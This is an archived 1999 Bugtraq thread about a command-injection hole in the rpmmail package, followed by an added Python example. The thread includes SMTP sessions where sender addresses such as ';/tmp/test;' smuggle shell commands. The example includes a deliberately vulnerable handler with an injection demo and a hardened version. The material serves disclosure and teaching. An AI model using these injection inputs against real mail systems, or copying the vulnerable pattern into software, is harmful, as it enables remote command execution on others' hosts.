Alright, this is getting a little silly. THIS IS NOT A HOLE IN SENDMAIL OR ANY OTHER MTA! AHH! PLEASE read the entire post before emailing me or this list about how it does or does not work!

To review: This is a hole in the RPMMAIL PACKAGE! RPMMAIL sets up an account called rpmmail and a .forward file that executes /home/rpmmail/rpmmail by piping the message received from whatever MTA you use into it. Thus all we need is for the MTA to pipe a message to rpmmail that contains metacharacters in the From: field. That's it. The only discussion of MTAs is about whether Sendmail or Smail will allow from fields which do not contain the "@whatever.com" piece. Smail does not require this, Sendmail does. Period.

-Brock

> ok This is what I have done and it does not work on RedHat 6.0
>
> Script started on Tue Oct 12 10:17:23 1999
> [root@blair /tmp]# uname -a
> Linux blair.idefense.com 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown
> [root@blair /tmp]# ls -l /tmp/test
> -rwxr-xr-x 1 fiji fiji 57 Oct 11 14:53 /tmp/test
> [root@blair /tmp]# cat /tmp/test
> #!/bin/sh
> echo "you have been hacked" > /tmp/test.output
> [root@blair /tmp]# telnet localhost 25
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> 220 blair.ipartnership.com ESMTP Sendmail 8.9.3/8.9.3; Tue, 12 Oct 1999 10:17:50 -0400
> mail from: ;/tmp/test;@microsoft.com
> 250 ;/tmp/test;@microsoft.com... Sender ok
> rcpt to: root
> 250 root... Recipient ok
> data
> 354 Enter mail, end with "." on a line by itself
> testing
> .
> 250 KAA15029 Message accepted for delivery
> quit
> 221 blair.ipartnership.com closing connection
> Connection closed by foreign host.
> [root@blair /tmp]# ls -l /tmp
> total 817
> drwx------ 2 root root 1024 Sep 21 10:53 orbit-root
> -rw-rw-r-- 1 root root 0 Oct 12 10:17 output
> -rwxr-xr-x 1 root root 10240 Oct 7 14:15 sniffit.0.3.5.p1.tar
> -rwxr-xr-x 1 root root 819200 Oct 7 14:16 sniffit.0.3.5.tar
> -rwxr-xr-x 1 fiji fiji 57 Oct 11 14:53 test
> [root@blair /tmp]#
> Script done on Tue Oct 12 10:18:27 1999
>
> as we can see there is no /tmp/test.output.
>
> -Fiji
>
> -----Original Message-----
> From: Brock Tellier [mailto:btellierat_private]
> Sent: Monday, October 11, 1999 12:02 PM
> To: BUGTRAQat_private
> Subject: Re: RH6.0 local/remote command execution
>
> There seems to be some confusion regarding this post. Let me try to explain.
>
> This post is titled "RH6.0 local/remote command execution" only because rpmmail is distributed on the RH6.0 Extra Applications CD. You can, of course, install rpmmail on any other linux variant, such as SuSE, which is what I did. I believe I made this clear when I pasted:
>
> >bash-2.03$ cat /etc/SuSE-release;uname -a;id
> >SuSE Linux 6.2 (i386)
> >VERSION = 6.2
> >Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
> >uid=100(xnec) gid=100(users) groups=100(users)
>
> In any case, as "D" pointed out,
>
> >MAIL FROM: ;/command/to/execute;
> >553 ;/command/to/execute;... Domain name required
> >MAIL FROM: ;/command/to/execute;@microsoft.com
> >250 ;/command/to/execute;@microsoft.com... Sender ok
>
> should work on sendmail 8.9.3.
>
> -Brock
>
> > That does not look like the MTA that comes with RH 6.0. That is smail not sendmail. I tried this on my RH 6.0 install and it didn't work.
> > Notice the "220 fear62 Smail-3.2"
> > It's not sendmail.
> >
> > -----Original Message-----
> > From: Bugtraq List [mailto:BUGTRAQat_private] On Behalf Of Neezam Haniff
> > Sent: Wednesday, October 06, 1999 12:50 PM
> > To: BUGTRAQat_private
> > Subject: RH6.0 local/remote command execution
> >
> > Hi,
> >
> > Here are some comments below...
> >
> > > The remote exploit is merely:
> > > bash-2.03$ telnet localhost 25
> > > Trying 127.0.0.1...
> > > Connected to localhost.
> > > Escape character is '^]'.
> > > 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500 (CDT)
> > > MAIL FROM: ;/command/to/execute;
> > > 250 <;/command/to/execute;> ... Sender Okay
> > > RCPT TO: rpmmail
> > > 250 <rpmmail> ... Recipient Okay
> > > data
> > > 354 Enter mail, end with "." on a line by itself
> > > .
> > > 250 Mail accepted
> > > quit
> >
> > I find it odd that this exploit could exist on a Red Hat 6.0 installation. sendmail 8.9.3 is the mailer that is installed and the way it's been configured, there's no way it would accept that sender address since it's not qualifiable. Please confirm this. This is what I get when I test this scenario on a Red Hat 6.0 system:
> >
> > [nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25
> > Trying 127.0.0.1...
> > Connected to localhost.
> > Escape character is '^]'.
> > 220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 13:31:55 -0400
> > helo x.x
> > 250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you
> > MAIL FROM: ;/command/to/execute;
> > 553 ;/command/to/execute;... Domain name required
> >
> > The only way someone could take advantage of this exploit is if their mailer configuration allows for the sender to be non-qualifiable.
> >
> > Neezam.
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP 6.0.2
> Comment: Encrypted Document from Infrastructure Defense, Inc.
>
> iQA/AwUBOANEhIKtj2fJZe4vEQK+FwCbBKM5fYtsEAI3TCYnFEmxZXs0tQEAoLQw
> Ho6rCei3wCD8Xfb3Q5+I7XSd
> =8GsP
> -----END PGP SIGNATURE-----
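The thread's point is that the MTA is only the delivery path: the bug is a .forward that pipes each message into a program which reuses the From: address in a shell command, so a sender of ;/tmp/test;@microsoft.com turns into three shell commands. The following is an added example that models that pattern and its fix; it is not rpmmail's own code (the package source is not on this page), and the reply command, the function names and the constructed messages are assumptions. The sample address carries the @microsoft.com tail for the reason given above: Sendmail 8.9.3 insists on a domain, Smail does not, and neither the handler nor the check below may rely on that.

```python
"""Model of the rpmmail-style .forward pipe handler discussed in the thread.

Added example, not rpmmail's actual code: it reconstructs only the pattern the
post describes (a .forward that pipes the message into a program which splices
the From: address into a shell command). The reply command, function names and
sample messages are assumptions for illustration.
"""
import os
import re
import subprocess
import tempfile
from email import message_from_string

# Strict addr-spec subset: dot-atom local part, dotted hostname domain.
# Anything else (';', '|', '`', '$(', spaces, ...) is rejected before a shell
# could ever see it. Assumed policy; tighten or loosen per site.
SAFE_ADDR = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def sender_of(raw_message: str) -> str:
    """Return the raw From: header of a message as the MTA piped it in."""
    return message_from_string(raw_message).get("From", "").strip()


def is_safe_sender(addr: str) -> bool:
    """True only for addresses that cannot carry shell metacharacters."""
    return SAFE_ADDR.match(addr) is not None


def vulnerable_handle(raw_message: str) -> str:
    """The unsafe pattern: splice the sender into a shell command string.

    With From: ';/tmp/test;@microsoft.com' the shell sees three commands and
    runs /tmp/test as the user owning the .forward. Returns the command string
    so a caller can see exactly what the shell received.
    """
    cmd = ("echo 'Thanks for your report' | mail -s 'rpmmail reply' "
           + sender_of(raw_message))
    # 'mail' may be absent on the demo host; the injected command still runs.
    subprocess.run(cmd, shell=True,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return cmd


def safe_handle(raw_message: str, mailer: str = "mail",
                execute: bool = False) -> list:
    """Hardened pattern: validate, then pass the address as one argv element.

    No shell is involved, so metacharacters cannot split the command even if
    the validation is loosened later. Returns the argv that would be run.
    """
    sender = sender_of(raw_message)
    if not is_safe_sender(sender):
        raise ValueError(f"refusing to reply to suspicious sender {sender!r}")
    argv = [mailer, "-s", "rpmmail reply", sender]
    if execute:
        subprocess.run(argv, input=b"Thanks for your report\n",
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return argv


def demo() -> bool:
    """Reproduce the thread's test: does a sender-controlled command run?"""
    with tempfile.TemporaryDirectory() as d:
        marker = os.path.join(d, "test.output")
        # Constructed message, mirroring 'mail from: ;/tmp/test;@microsoft.com'
        # delivered to the rpmmail account; 'touch' stands in for /tmp/test.
        evil = (f"From: ;touch {marker};@microsoft.com\n"
                "To: rpmmail\n\ntesting\n")
        vulnerable_handle(evil)
        executed = os.path.exists(marker)   # True: the injected command ran
    return executed


if __name__ == "__main__":
    print("injected command executed:", demo())
    print("hardened argv:", safe_handle("From: fiji@idefense.com\n\nhi\n"))
```

A real handler would first reduce the header to an addr-spec with email.utils.parseaddr and validate that, since a legitimate From: may carry a display name; the point of the example is that the argv form keeps the whole sender as a single argument regardless, while the shell form hands it to the MTA-independent part of the chain, which is where the thread locates the hole.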
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:07:20 PDT